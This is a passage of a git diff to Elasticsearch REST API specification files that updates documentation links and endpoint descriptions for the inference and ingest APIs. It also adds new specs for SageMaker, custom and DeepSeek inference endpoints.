a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.get.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.get.json @@ -1,7 +1,7 @@ { "inference.get": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/get-inference-api.html", + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-get", "description": "Get an inference endpoint" }, "stability": "stable", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.inference.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.inference.json index bf1282dfaaef7..1ada118f0edd8 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.inference.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.inference.json @@ -1,8 +1,8 @@ { "inference.inference": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/post-inference-api.html", - "description": "Perform inference" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-inference", + "description": "Perform inference on the service" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put.json index 4879007724450..7b67b74bed9fc 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put.json @@ -1,8 +1,8 @@ { "inference.put": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/put-inference-api.html", - "description": "Configure an inference endpoint for use in the Inference API" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put", + "description": "Create an inference endpoint" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_alibabacloud.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_alibabacloud.json index b39d5abe97ca2..2640f47b3c94d 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_alibabacloud.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_alibabacloud.json @@ -1,8 +1,8 @@ { "inference.put_alibabacloud": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/infer-service-alibabacloud-ai-search.html", - "description": "Configure an AlibabaCloud AI Search inference endpoint" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put-alibabacloud", + "description": "Create an AlibabaCloud AI Search inference endpoint" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_amazonbedrock.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_amazonbedrock.json index 266a1800a360e..c313ccba1e1e4 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_amazonbedrock.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_amazonbedrock.json @@ -1,8 +1,8 @@ { "inference.put_amazonbedrock": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/infer-service-amazon-bedrock.html", - "description": "Configure an Amazon Bedrock inference endpoint" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put-amazonbedrock", + "description": "Create an Amazon Bedrock inference endpoint" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_amazonsagemaker.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_amazonsagemaker.json new file mode 100644 index 0000000000000..415c230f3eb9d --- /dev/null +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_amazonsagemaker.json @@ -0,0 +1,35 @@ +{ + "inference.put_amazonsagemaker": { + "documentation": { + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put-amazonsagemaker", + "description": "Create an Amazon SageMaker inference endpoint" + }, + "stability": "stable", + "visibility": "public", + "headers": { + "accept": ["application/json"], + "content_type": ["application/json"] + }, + "url": { + "paths": [ + { + "path": "/_inference/{task_type}/{amazonsagemaker_inference_id}", + "methods": ["PUT"], + "parts": { + "task_type": { + "type": "string", + "description": "The task type" + }, + "amazonsagemaker_inference_id": { + "type": "string", + "description": "The inference Id" + } + } + } + ] + }, + "body": { + "description": "The inference endpoint's task and service settings" + } + } +} diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_anthropic.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_anthropic.json index dce56157c7d0e..6f022c9489c33 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_anthropic.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_anthropic.json @@ -1,8 +1,8 @@ { "inference.put_anthropic": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/infer-service-anthropic.html", - "description": "Configure an Anthropic inference endpoint" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put-anthropic", + "description": "Create an Anthropic inference endpoint" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_azureaistudio.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_azureaistudio.json index 00de83eca7ce2..e0b2ebb49638a 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_azureaistudio.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_azureaistudio.json @@ -1,8 +1,8 @@ { "inference.put_azureaistudio": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/infer-service-azure-ai-studio.html", - "description": "Configure an Azure AI Studio inference endpoint" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put-azureaistudio", + "description": "Create an Azure AI studio inference endpoint" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_azureopenai.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_azureopenai.json index 8739adb1f5fd1..c2d02e513ce42 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_azureopenai.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_azureopenai.json @@ -1,8 +1,8 @@ { "inference.put_azureopenai": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/infer-service-azure-openai.html", - "description": "Configure an Azure OpenAI inference endpoint" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put-azureopenai", + "description": "Create an Azure OpenAI inference endpoint" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_cohere.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_cohere.json index a00518f2c5c9e..153bf2b787920 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_cohere.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_cohere.json @@ -1,8 +1,8 @@ { "inference.put_cohere": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/infer-service-cohere.html", - "description": "Configure a Cohere inference endpoint" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put-cohere", + "description": "Create a Cohere inference endpoint" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_custom.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_custom.json new file mode 100644 index 0000000000000..d14089cf12217 --- /dev/null +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_custom.json @@ -0,0 +1,35 @@ +{ + "inference.put_custom": { + "documentation": { + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put-custom", + "description": "Create a custom inference endpoint" + }, + "stability": "stable", + "visibility": "public", + "headers": { + "accept": ["application/json"], + "content_type": ["application/json"] + }, + "url": { + "paths": [ + { + "path": "/_inference/{task_type}/{custom_inference_id}", + "methods": ["PUT"], + "parts": { + "task_type": { + "type": "string", + "description": "The task type" + }, + "custom_inference_id": { + "type": "string", + "description": "The inference Id" + } + } + } + ] + }, + "body": { + "description": "The inference endpoint's task and service settings" + } + } +} diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_deepseek.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_deepseek.json new file mode 100644 index 0000000000000..96da2c931231e --- /dev/null +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_deepseek.json @@ -0,0 +1,35 @@ +{ + "inference.put_deepseek": { + "documentation": { + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put-deepseek", + "description": "Create a DeepSeek inference endpoint" + }, + "stability": "stable", + "visibility": "public", + "headers": { + "accept": ["application/json"], + "content_type": ["application/json"] + }, + "url": { + "paths": [ + { + "path": "/_inference/{task_type}/{deepseek_inference_id}", + "methods": ["PUT"], + "parts": { + "task_type": { + "type": "string", + "description": "The task type" + }, + "deepseek_inference_id": { + "type": "string", + "description": "The inference Id" + } + } + } + ] + }, + "body": { + "description": "The inference endpoint's task and service settings" + } + } +} diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_elasticsearch.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_elasticsearch.json index 0c326b79e93b8..adae4e68838b8 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_elasticsearch.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_elasticsearch.json @@ -1,8 +1,8 @@ { "inference.put_elasticsearch": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/infer-service-elasticsearch.html", - "description": "Configure an Elasticsearch inference endpoint" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put-elasticsearch", + "description": "Create an Elasticsearch inference endpoint" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_elser.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_elser.json index e601e6c8c3bca..fdee3cf2732bd 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_elser.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_elser.json @@ -5,8 +5,8 @@ "description" : "The elser service is deprecated. Use the Elasticsearch inference integration instead, with model_id included in the service_settings." }, "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/infer-service-elser.html", - "description": "Configure an ELSER inference endpoint" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put-elser", + "description": "Create an ELSER inference endpoint" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_googleaistudio.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_googleaistudio.json index 4574626b61c00..dce5d98c169e7 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_googleaistudio.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_googleaistudio.json @@ -1,8 +1,8 @@ { "inference.put_googleaistudio": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/infer-service-google-ai-studio.html", - "description": "Configure a Google AI Studio inference endpoint" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put-googleaistudio", + "description": "Create an Google AI Studio inference endpoint" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_googlevertexai.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_googlevertexai.json index 6068d4cbc91ba..6dd400f4d1730 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_googlevertexai.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_googlevertexai.json @@ -1,8 +1,8 @@ { "inference.put_googlevertexai": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/infer-service-google-vertex-ai.html", - "description": "Configure a Google Vertex AI inference endpoint" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put-googlevertexai", + "description": "Create a Google Vertex AI inference endpoint" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_hugging_face.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_hugging_face.json index 76965d61ba839..c0fa9aa65ab01 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_hugging_face.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_hugging_face.json @@ -1,8 +1,8 @@ { "inference.put_hugging_face": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/infer-service-hugging-face.html", - "description": "Configure a HuggingFace inference endpoint" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put-hugging-face", + "description": "Create a Hugging Face inference endpoint" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_jinaai.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_jinaai.json index 80af2a69c9f1c..5d4e8e271924c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_jinaai.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_jinaai.json @@ -1,8 +1,8 @@ { "inference.put_jinaai": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/infer-service-jinaai.html", - "description": "Configure a JinaAI inference endpoint" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put-jinaai", + "description": "Create an JinaAI inference endpoint" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_mistral.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_mistral.json index 97633b233ce83..2738bf4a90e05 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_mistral.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_mistral.json @@ -1,8 +1,8 @@ { "inference.put_mistral": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/infer-service-mistral.html", - "description": "Configure a Mistral inference endpoint" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put-mistral", + "description": "Create a Mistral inference endpoint" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_openai.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_openai.json index 5405206c8cacc..85f14dd206c1a 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_openai.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_openai.json @@ -1,8 +1,8 @@ { "inference.put_openai": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/infer-service-openai.html", - "description": "Configure an OpenAI inference endpoint" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put-openai", + "description": "Create an OpenAI inference endpoint" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_voyageai.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_voyageai.json index 79a1016560f1a..00af79bed8742 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_voyageai.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_voyageai.json @@ -1,8 +1,8 @@ { "inference.put_voyageai": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/inference-apis.html", - "description": "Configure a VoyageAI inference endpoint" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put-voyageai", + "description": "Create a VoyageAI inference endpoint" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_watsonx.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_watsonx.json index db5a42d504b7a..80f9a01ae8571 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_watsonx.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.put_watsonx.json @@ -1,8 +1,8 @@ { "inference.put_watsonx": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/current/infer-service-watsonx-ai.html", - "description": "Configure a Watsonx inference endpoint" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-put-watsonx", + "description": "Create a Watsonx inference endpoint" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.rerank.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.rerank.json index c08a51a8b9b98..797f315970ee4 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.rerank.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.rerank.json @@ -1,8 +1,8 @@ { "inference.rerank": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/post-inference-api.html", - "description": "Perform reranking inference" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-inference", + "description": "Perform reranking inference on the service" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.sparse_embedding.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.sparse_embedding.json index 90ebb6e6dc4c2..61bfbde36d579 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.sparse_embedding.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.sparse_embedding.json @@ -1,8 +1,8 @@ { "inference.sparse_embedding": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/post-inference-api.html", - "description": "Perform sparse embedding inference" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-inference", + "description": "Perform sparse embedding inference on the service" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.stream_completion.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.stream_completion.json index b4eddb1641233..6dfd2bc1c7d9c 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.stream_completion.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.stream_completion.json @@ -1,8 +1,8 @@ { "inference.stream_completion": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/post-stream-inference-api.html", - "description": "Perform streaming completion inference" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-stream-inference", + "description": "Perform streaming inference" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.text_embedding.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.text_embedding.json index 309a1d80b7416..aadf35f009f19 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.text_embedding.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.text_embedding.json @@ -1,8 +1,8 @@ { "inference.text_embedding": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/post-inference-api.html", - "description": "Perform text embedding inference" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-inference", + "description": "Perform text embedding inference on the service" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.update.json b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.update.json index 133354e3ec5be..2772c50e893ff 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/inference.update.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/inference.update.json @@ -1,8 +1,8 @@ { "inference.update": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/update-inference-api.html", - "description": "Update inference" + "url": "https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-inference-update", + "description": "Update an inference endpoint" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/info.json b/rest-api-spec/src/main/resources/rest-api-spec/api/info.json index 286a06f73671d..d74881f7efef0 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/info.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/info.json @@ -1,8 +1,8 @@ { "info":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/index.html", - "description":"Returns basic information about the cluster." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/group/endpoint-info", + "description":"Get cluster info" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.delete_geoip_database.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.delete_geoip_database.json index f76d328836d90..f5bcf037cf515 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.delete_geoip_database.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.delete_geoip_database.json @@ -1,8 +1,8 @@ { "ingest.delete_geoip_database":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/delete-geoip-database-api.html", - "description":"Deletes a geoip database configuration" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ingest-delete-geoip-database", + "description":"Delete GeoIP database configurations" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.delete_ip_location_database.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.delete_ip_location_database.json index 341ff5081e270..c6993291ba033 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.delete_ip_location_database.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.delete_ip_location_database.json @@ -1,8 +1,8 @@ { "ingest.delete_ip_location_database":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/delete-ip-location-database-api.html", - "description":"Deletes an ip location database configuration" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ingest-delete-ip-location-database", + "description":"Delete IP geolocation database configurations" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.delete_pipeline.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.delete_pipeline.json index a1f6c0f72732a..82381a9d0299e 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.delete_pipeline.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.delete_pipeline.json @@ -1,8 +1,8 @@ { "ingest.delete_pipeline":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/delete-pipeline-api.html", - "description":"Deletes a pipeline." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ingest-delete-pipeline", + "description":"Delete pipelines" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.geo_ip_stats.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.geo_ip_stats.json index 1013d7dc6fc5e..e577a5622bfd3 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.geo_ip_stats.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.geo_ip_stats.json @@ -1,8 +1,8 @@ { "ingest.geo_ip_stats": { "documentation": { - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/geoip-stats-api.html", - "description": "Returns statistical information about geoip databases" + "url": "https://www.elastic.co/docs/reference/enrich-processor/geoip-processor", + "description": "Get GeoIP statistics" }, "stability": "stable", "visibility": "public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.get_geoip_database.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.get_geoip_database.json index 5c59994d4b22e..a73a59150a0ff 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.get_geoip_database.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.get_geoip_database.json @@ -1,8 +1,8 @@ { "ingest.get_geoip_database":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/get-geoip-database-api.html", - "description":"Returns geoip database configuration." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ingest-get-geoip-database", + "description":"Get GeoIP database configurations" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.get_ip_location_database.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.get_ip_location_database.json index a2e42fe6c8e59..d05595a4efe8b 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.get_ip_location_database.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.get_ip_location_database.json @@ -1,8 +1,8 @@ { "ingest.get_ip_location_database":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/get-ip-location-database-api.html", - "description":"Returns the specified ip location database configuration" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ingest-get-ip-location-database", + "description":"Get IP geolocation database configurations" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.get_pipeline.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.get_pipeline.json index d6d408eafb85b..639821f8f2416 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.get_pipeline.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.get_pipeline.json @@ -1,8 +1,8 @@ { "ingest.get_pipeline":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/get-pipeline-api.html", - "description":"Returns a pipeline." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ingest-get-pipeline", + "description":"Get pipelines" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.processor_grok.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.processor_grok.json index e150d95343729..cd74e44ad4d90 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.processor_grok.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.processor_grok.json @@ -1,8 +1,8 @@ { "ingest.processor_grok":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/grok-processor.html#grok-processor-rest-get", - "description":"Returns a list of the built-in patterns." + "url":"https://www.elastic.co/docs/reference/enrich-processor/grok-processor", + "description":"Run a grok processor" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.put_geoip_database.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.put_geoip_database.json index 9c2677d1f7b2f..7bab03d14a4f1 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.put_geoip_database.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.put_geoip_database.json @@ -1,8 +1,8 @@ { "ingest.put_geoip_database":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/put-geoip-database-api.html", - "description":"Puts the configuration for a geoip database to be downloaded" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ingest-put-geoip-database", + "description":"Create or update a GeoIP database configuration" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.put_ip_location_database.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.put_ip_location_database.json index 782048b98160a..e98cae991b729 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.put_ip_location_database.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.put_ip_location_database.json @@ -1,8 +1,8 @@ { "ingest.put_ip_location_database":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/put-ip-location-database-api.html", - "description":"Puts the configuration for a ip location database to be downloaded" + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ingest-put-ip-location-database", + "description":"Create or update an IP geolocation database configuration" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.put_pipeline.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.put_pipeline.json index f74fbfbcc4d06..07d5dadf92e29 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.put_pipeline.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.put_pipeline.json @@ -1,8 +1,8 @@ { "ingest.put_pipeline":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/put-pipeline-api.html", - "description":"Creates or updates a pipeline." + "url":"https://www.elastic.co/docs/manage-data/ingest/transform-enrich/ingest-pipelines", + "description":"Create or update a pipeline" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.simulate.json b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.simulate.json index 04b704646d28f..dfa2aa98247f4 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.simulate.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/ingest.simulate.json @@ -1,8 +1,8 @@ { "ingest.simulate":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/master/simulate-pipeline-api.html", - "description":"Allows to simulate a pipeline with example documents." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-ingest-simulate", + "description":"Simulate a pipeline" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/knn_search.json b/rest-api-spec/src/main/resources/rest-api-spec/api/knn_search.json index 6faee49d480be..4fb20b686794c 100644 --- 